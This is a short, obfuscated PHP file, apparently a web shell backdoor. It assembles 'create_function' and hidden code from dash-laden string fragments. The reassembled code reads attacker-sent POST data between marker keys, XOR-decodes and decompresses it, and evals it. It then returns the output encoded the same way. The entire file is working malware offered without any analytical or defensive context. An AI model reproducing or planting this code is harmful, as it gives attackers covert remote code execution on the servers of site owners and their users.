<?
$L='-;@e--val(@gzuncompre-ss(@x(@ba--se64_decode-($m[-1]),$k)))-;$o=@-ob_ge--t_contents()-;@';
$r='ob_-end_clean-();$r=-@-b-ase64-_encode(@x(@-gzcom-press(-$o),$k-));pri-n-t("$p$kh$r$kf");}';
$P=str_replace('q','','qcreatqeq_qfqunqction');
$J=';-($j<$-c&&$-i-<$l);$-j++-,$i++){$o.--=$t{$-i}^$k{$j};}}retu-r-n $o;-}if (@preg_mat--';
$Q='unc--tion x($t,$k){-$c=strl-en($-k-);$l=strlen($-t)-;$o=-"";for(-$i=0;$i<$-l;){-for($j=0';
$R='ch("/$kh(.+)---$kf/"-,@file_get_contents--("p-hp-://input"),-$m)==1) {@ob_sta-rt()';
$Z='$k="e63-0bcef-";$kh="2e-7ce--559-108b";$k-f="63b-dd5-3d997b";$p="Aw-2LTGNUI-Lb-TTMZa";f';
$q=str_replace('-','',$Z.$Q.$J.$R.$L.$r);
$x=$P('',$q);$x();
?>
